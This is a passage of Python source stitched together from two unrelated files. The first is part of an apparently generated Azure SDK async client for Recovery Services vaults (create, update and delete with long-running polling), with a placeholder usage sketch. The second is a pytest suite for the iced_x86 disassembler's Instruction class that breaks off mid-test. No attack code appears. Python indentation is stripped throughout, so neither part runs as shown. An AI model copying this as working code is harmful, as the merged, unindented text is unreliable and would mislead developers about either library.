body_content = self._serialize.body(vault, 'Vault')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Vault', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.Vault",
**kwargs: Any
) -> AsyncLROPoller["_models.Vault"]:
"""Creates or updates a Recovery Services vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param vault: Recovery Services Vault to be created.
:type vault: ~azure.mgmt.recoveryservices.models.Vault
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Vault or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.recoveryservices.models.Vault]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
vault_name=vault_name,
vault=vault,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
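# illustrative usage (client and vault objects are placeholders):
#
#   poller = await client.vaults.begin_create_or_update(
#       "my-rg", "my-vault", vault)
#   created = await poller.result()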
async def delete(
self,
resource_group_name: str,
vault_name: str,
**kwargs: Any
) -> None:
"""Deletes a vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.PatchVault",
**kwargs: Any
) -> Optional["_models.Vault"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Vault"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vault, 'PatchVault')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.PatchVault",
**kwargs: Any
) -> AsyncLROPoller["_models.Vault"]:
"""Updates the vault.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param vault: Recovery Services Vault to be updated.
:type vault: ~azure.mgmt.recoveryservices.models.PatchVault
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Vault or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.recoveryservices.models.Vault]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
vault_name=vault_name,
vault=vault,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
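# Illustrative caller for the LRO method above -- a minimal sketch, not part of
# the generated client. It assumes azure-mgmt-recoveryservices and
# azure-identity are installed, and that the resource group and vault names
# (placeholders below) exist in the subscription.
import asyncio

from azure.identity.aio import DefaultAzureCredential
from azure.mgmt.recoveryservices.aio import RecoveryServicesClient
from azure.mgmt.recoveryservices.models import PatchVault

async def update_vault_tags(subscription_id: str) -> None:
    async with DefaultAzureCredential() as credential:
        async with RecoveryServicesClient(credential, subscription_id) as client:
            poller = await client.vaults.begin_update(
                resource_group_name="example-rg",    # placeholder
                vault_name="example-vault",          # placeholder
                vault=PatchVault(tags={"env": "test"}),
            )
            vault = await poller.result()  # waits for the LRO to finish
            print(vault.name, vault.tags)

if __name__ == "__main__":
    # placeholder subscription id; requires valid Azure credentials to run
    asyncio.run(update_vault_tags("00000000-0000-0000-0000-000000000000"))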
#
# SPDX-License-Identifier: MIT
# Copyright wtfsckgh@gmail.com
# Copyright iced contributors
#
import copy
import pytest
from iced_x86 import *
def test_ctor():
instr = Instruction()
assert instr.code == Code.INVALID
assert instr.code_size == CodeSize.UNKNOWN
assert instr.len == 0
assert instr.ip == 0
def test_eq_ne_hash():
decodera = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41" b"\xC4\xE3\x49\x48\x10\x42")
decoderb = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decodera.ip = 0x1234_5678_9ABC_DEF1
decoderb.ip = 0xABCD_EF01_1234_5678
instr1 = decodera.decode()
instr2 = decodera.decode()
instr3 = decoderb.decode()
assert instr1 == instr1
assert not (instr1 != instr1)
assert instr1 != instr2
assert not (instr1 == instr2)
assert instr1 == instr3
assert not (instr1 != instr3)
assert hash(instr1) == hash(instr3)
assert instr1 != 1
assert instr1 != 1.23
assert instr1 != None
assert instr1 != []
assert instr1 != {}
assert instr1 != (1, 2)
assert not (instr1 == 1)
assert not (instr1 == 1.23)
assert not (instr1 == None)
assert not (instr1 == [])
assert not (instr1 == {})
assert not (instr1 == (1, 2))
def test_invalid():
instr = Instruction()
assert not instr
assert instr.is_invalid
instr.code = Code.ADD_AL_IMM8
assert instr
assert not instr.is_invalid
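# As the next test demonstrates, Instruction.__eq__/__hash__ ignore the IP,
# while eq_all_bits() compares every field including the IP: two copies of the
# same instruction at different IPs are "==" but not eq_all_bits().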
@pytest.mark.parametrize("copy_instr", [
lambda instr: copy.copy(instr),
lambda instr: copy.deepcopy(instr),
lambda instr: instr.copy(),
])
def test_copy_deepcopy_mcopy(copy_instr):
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
instr2 = copy_instr(instr)
assert instr is not instr2
assert id(instr) != id(instr2)
assert instr == instr2
assert not (instr != instr2)
assert instr.eq_all_bits(instr2)
assert instr2.eq_all_bits(instr)
assert hash(instr) == hash(instr2)
instr2.ip += 1
assert instr == instr2
assert not (instr != instr2)
assert not instr.eq_all_bits(instr2)
assert not instr2.eq_all_bits(instr)
assert hash(instr) == hash(instr2)
def test_some_props1():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.len == 6
assert len(instr) == 6
assert instr.ip16 == 0xDEF1
assert instr.ip32 == 0x9ABC_DEF1
assert instr.ip == 0x1234_5678_9ABC_DEF1
assert instr.next_ip16 == 0xDEF7
assert instr.next_ip32 == 0x9ABC_DEF7
assert instr.next_ip == 0x1234_5678_9ABC_DEF7
instr.ip = 0x9ABC_DEF0_1234_5678
assert instr.ip16 == 0x5678
assert instr.ip32 == 0x1234_5678
assert instr.ip == 0x9ABC_DEF0_1234_5678
assert instr.next_ip16 == 0x567E
assert instr.next_ip32 == 0x1234_567E
assert instr.next_ip == 0x9ABC_DEF0_1234_567E
instr.ip = 0x9ABC_DEF0_1234_5678
instr.ip32 = 0xABCD_EF01
assert instr.ip16 == 0xEF01
assert instr.ip32 == 0xABCD_EF01
assert instr.ip == 0xABCD_EF01
assert instr.next_ip16 == 0xEF07
assert instr.next_ip32 == 0xABCD_EF07
assert instr.next_ip == 0xABCD_EF07
instr.ip = 0x9ABC_DEF0_1234_5678
instr.ip16 = 0xABCD
assert instr.ip16 == 0xABCD
assert instr.ip32 == 0xABCD
assert instr.ip == 0xABCD
assert instr.next_ip16 == 0xABD3
assert instr.next_ip32 == 0xABD3
assert instr.next_ip == 0xABD3
instr.next_ip = 0x9ABC_DEF0_1234_5678
assert instr.ip16 == 0x5672
assert instr.ip32 == 0x1234_5672
assert instr.ip == 0x9ABC_DEF0_1234_5672
assert instr.next_ip16 == 0x5678
assert instr.next_ip32 == 0x1234_5678
assert instr.next_ip == 0x9ABC_DEF0_1234_5678
instr.next_ip = 0x9ABC_DEF0_1234_5678
instr.next_ip32 = 0xABCD_EF01
assert instr.ip16 == 0xEEFB
assert instr.ip32 == 0xABCD_EEFB
assert instr.ip == 0xABCD_EEFB
assert instr.next_ip16 == 0xEF01
assert instr.next_ip32 == 0xABCD_EF01
assert instr.next_ip == 0xABCD_EF01
instr.next_ip = 0x9ABC_DEF0_1234_5678
instr.next_ip16 = 0xABCD
assert instr.ip16 == 0xABC7
assert instr.ip32 == 0xABC7
assert instr.ip == 0xABC7
assert instr.next_ip16 == 0xABCD
assert instr.next_ip32 == 0xABCD
assert instr.next_ip == 0xABCD
assert instr.code == Code.VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4
assert instr.mnemonic == Mnemonic.VPERMIL2PS
assert instr.op_count == 5
instr.code = Code.ADD_AL_IMM8
assert instr.code == Code.ADD_AL_IMM8
assert instr.mnemonic == Mnemonic.ADD
assert instr.op_count == 2
assert instr.len == 6
assert len(instr) == 6
instr.len = 1
assert instr.len == 1
assert len(instr) == 1
def test_some_props2():
decoder = Decoder(64, b"\x00\xCE")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert not instr.has_xacquire_prefix
instr.has_xacquire_prefix = True
assert instr.has_xacquire_prefix
assert not instr.has_xrelease_prefix
instr.has_xrelease_prefix = True
assert instr.has_xrelease_prefix
assert not instr.has_rep_prefix
assert not instr.has_repe_prefix
instr.has_rep_prefix = True
assert instr.has_rep_prefix
assert instr.has_repe_prefix
instr.has_repe_prefix = False
assert not instr.has_rep_prefix
assert not instr.has_repe_prefix
assert not instr.has_repne_prefix
instr.has_repne_prefix = True
assert instr.has_repne_prefix
assert not instr.has_lock_prefix
instr.has_lock_prefix = True
assert instr.has_lock_prefix
assert instr.op_mask == Register.NONE
assert not instr.has_op_mask
instr.op_mask = Register.K2
assert instr.op_mask == Register.K2
assert instr.has_op_mask
assert not instr.zeroing_masking
assert instr.merging_masking
instr.zeroing_masking = True
assert instr.zeroing_masking
assert not instr.merging_masking
instr.merging_masking = True
assert not instr.zeroing_masking
assert instr.merging_masking
assert instr.rounding_control == RoundingControl.NONE
instr.rounding_control = RoundingControl.ROUND_TO_NEAREST
assert instr.rounding_control == RoundingControl.ROUND_TO_NEAREST
assert not instr.suppress_all_exceptions
instr.suppress_all_exceptions = True
assert instr.suppress_all_exceptions
assert not instr.is_privileged
assert not instr.is_save_restore_instruction
@pytest.mark.parametrize("bitness, code_size, data", [
(16, CodeSize.CODE16, b"\x90"),
(32, CodeSize.CODE32, b"\x90"),
(64, CodeSize.CODE64, b"\x90"),
])
def test_code_size(bitness, code_size, data):
instr = Decoder(bitness, data).decode()
assert instr.code_size == code_size
for new_size in [CodeSize.UNKNOWN, CodeSize.CODE16, CodeSize.CODE32, CodeSize.CODE64]:
instr.code_size = new_size
assert instr.code_size == new_size
def test_op_kind():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.op0_kind == OpKind.REGISTER
assert instr.op1_kind == OpKind.REGISTER
assert instr.op2_kind == OpKind.MEMORY
assert instr.op3_kind == OpKind.REGISTER
assert instr.op4_kind == OpKind.IMMEDIATE8
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
instr.op0_kind = OpKind.FAR_BRANCH16
instr.op1_kind = OpKind.FAR_BRANCH32
instr.op2_kind = OpKind.IMMEDIATE16
instr.op3_kind = OpKind.IMMEDIATE32
assert instr.op0_kind == OpKind.FAR_BRANCH16
assert instr.op1_kind == OpKind.FAR_BRANCH32
assert instr.op2_kind == OpKind.IMMEDIATE16
assert instr.op3_kind == OpKind.IMMEDIATE32
with pytest.raises(ValueError):
instr.op4_kind = OpKind.IMMEDIATE64
instr.op4_kind = OpKind.IMMEDIATE8
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
instr.set_op_kind(0, OpKind.IMMEDIATE8)
instr.set_op_kind(1, OpKind.IMMEDIATE8TO16)
instr.set_op_kind(2, OpKind.IMMEDIATE8TO32)
instr.set_op_kind(3, OpKind.IMMEDIATE8TO64)
assert instr.op0_kind == OpKind.IMMEDIATE8
assert instr.op1_kind == OpKind.IMMEDIATE8TO16
assert instr.op2_kind == OpKind.IMMEDIATE8TO32
assert instr.op3_kind == OpKind.IMMEDIATE8TO64
with pytest.raises(ValueError):
instr.set_op_kind(4, OpKind.IMMEDIATE64)
instr.set_op_kind(4, OpKind.IMMEDIATE8)
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
def test_op_register():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\xD3\x40")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.op0_kind == OpKind.REGISTER
assert instr.op1_kind == OpKind.REGISTER
assert instr.op2_kind == OpKind.REGISTER
assert instr.op3_kind == OpKind.REGISTER
assert instr.op4_kind == OpKind.IMMEDIATE8
assert instr.op0_register == Register.XMM2
assert instr.op1_register == Register.XMM6
assert instr.op2_register == Register.XMM3
assert instr.op3_register == Register.XMM4
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM2
assert instr.op_register(1) == Register.XMM6
assert instr.op_register(2) == Register.XMM3
assert instr.op_register(3) == Register.XMM4
assert instr.op_register(4) == Register.NONE
instr.op0_register = Register.XMM1
instr.op1_register = Register.XMM5
instr.op2_register = Register.XMM7
instr.op3_register = Register.XMM13
with pytest.raises(ValueError):
instr.op4_register = Register.XMM15
instr.op4_register = Register.NONE
assert instr.op0_register == Register.XMM1
assert instr.op1_register == Register.XMM5
assert instr.op2_register == Register.XMM7
assert instr.op3_register == Register.XMM13
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM1
assert instr.op_register(1) == Register.XMM5
assert instr.op_register(2) == Register.XMM7
assert instr.op_register(3) == Register.XMM13
assert instr.op_register(4) == Register.NONE
instr.set_op_register(0, Register.XMM0)
instr.set_op_register(1, Register.XMM8)
instr.set_op_register(2, Register.XMM10)
instr.set_op_register(3, Register.XMM11)
with pytest.raises(ValueError):
instr.set_op_register(4, Register.XMM14)
instr.set_op_register(4, Register.NONE)
assert instr.op0_register == Register.XMM0
assert instr.op1_register == Register.XMM8
assert instr.op2_register == Register.XMM10
assert instr.op3_register == Register.XMM11
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM0
assert instr.op_register(1) == Register.XMM8
assert instr.op_register(2) == Register.XMM10
assert instr.op_register(3) == Register.XMM11
assert instr.op_register(4) == Register.NONE
def test_mem():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert not instr.has_segment_prefix
assert instr.segment_prefix == Register.NONE
assert instr.memory_segment == Register.DS
instr.segment_prefix = Register.GS
assert instr.has_segment_prefix
assert instr.segment_prefix == Register.GS
assert instr.memory_segment == Register.GS
assert instr.memory_displ_size == 0
instr.memory_displ_size = 1
assert instr.memory_displ_size == 1
instr.memory_displ_size = 2
assert instr.memory_displ_size == 2
instr.memory_displ_size = 4
assert instr.memory_displ_size == 4
instr.memory_displ_size = 8
assert instr.memory_displ_size == 8
instr.memory_displ_size = 0
assert instr.memory_displ_size == 0
assert instr.memory_size == MemorySize.PACKED128_FLOAT32
assert not instr.is_broadcast
instr.is_broadcast = True
assert instr.is_broadcast
assert instr.memory_index_scale == 1
instr.memory_index_scale = 2
assert instr.memory_index_scale == 2
instr.memory_index_scale = 4
assert instr.memory_index_scale == 4
instr.memory_index_scale = 8
assert instr.memory_index_scale == 8
instr.memory_index_scale = 1
assert instr.memory_index_scale == 1
assert instr.memory_displacement == 0
instr.memory_displacement = 0xFEDC_BA98_7654_3210
assert instr.memory_displacement == 0xFEDC_BA98_7654_3210
instr.memory_displacement = 0x1234_5678_9ABC_DEF1
assert instr.memory_displacement == 0x1234_5678_9ABC_DEF1
assert instr.memory_base == Register.RAX
instr.memory_base = Register.R15D
assert instr.memory_base == Register.R15D
assert instr.memory_index == Register.NONE
instr.memory_index = Register.XMM13
assert instr.memory_index == Register.XMM13
def test_imm8():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8
instr.immediate8 = 0xFE
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8 == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u32(0, 0xFE)
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8 == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u64(0, 0xFE)
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
def test_imm8_2nd():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8_2ND
instr.immediate8_2nd = 0xFE
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8_2nd == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u32(0, 0xFE)
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8_2nd == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u64(0, 0xFE)
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
def test_imm16():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE16
instr.immediate16 = 0xFEDC
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
instr.set_immediate_i32(0, -0x1234)
assert instr.immediate16 == 0xEDCC
assert instr.immediate(0) == 0xEDCC
instr.set_immediate_u32(0, 0xFEDC)
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
instr.set_immediate_i64(0, -0x1234)
assert instr.immediate16 == 0xEDCC
assert instr.immediate(0) == 0xEDCC
instr.set_immediate_u64(0, 0xFEDC)
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
def test_imm32():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE32
instr.immediate32 = 0xFEDC_BA98
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate32 == 0xEDCB_A988
assert instr.immediate(0) == 0xEDCB_A988
instr.set_immediate_u32(0, 0xFEDC_BA98)
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i64(0, -0x1234_5678)
assert instr.immediate32 == 0xEDCB_A988
assert instr.immediate(0) == 0xEDCB_A988
instr.set_immediate_u64(0, 0xFEDC_BA98)
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
def test_imm64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE64
instr.immediate64 = 0xFEDC_BA98_7654_3219
assert instr.immediate64 == 0xFEDC_BA98_7654_3219
assert instr.immediate(0) == 0xFEDC_BA98_7654_3219
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate64 == 0xFFFF_FFFF_EDCB_A988
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u32(0, 0xFEDC_BA98)
assert instr.immediate64 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i64(0, -0x1234_5678_9ABC_DEF1)
assert instr.immediate64 == 0xEDCB_A987_6543_210F
assert instr.immediate(0) == 0xEDCB_A987_6543_210F
instr.set_immediate_u64(0, 0xFEDC_BA98_7654_3219)
assert instr.immediate64 == 0xFEDC_BA98_7654_3219
assert instr.immediate(0) == 0xFEDC_BA98_7654_3219
def test_imm8to16():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO16
instr.immediate8to16 = -0x12
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to16 = 0x12
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
def test_imm8to32():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO32
instr.immediate8to32 = -0x12
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to32 = 0x12
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
def test_imm8to64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO64
instr.immediate8to64 = -0x12
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to64 = 0x12
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
def test_imm32to64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE32TO64
instr.immediate32to64 = -0x1234_5678
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.immediate32to64 = 0x1234_5678
assert instr.immediate32to64 == 0x1234_5678
assert instr.immediate(0) == 0x1234_5678
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u32(0, 0x1234_5678)
assert instr.immediate32to64 == 0x1234_5678
assert instr.immediate(0) == 0x1234_5678
instr.set_immediate_i64(0, -0x1234_5678)
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u64(0, 0x1234_5678)
assert instr.immediate32to64 == 0x1234_5678
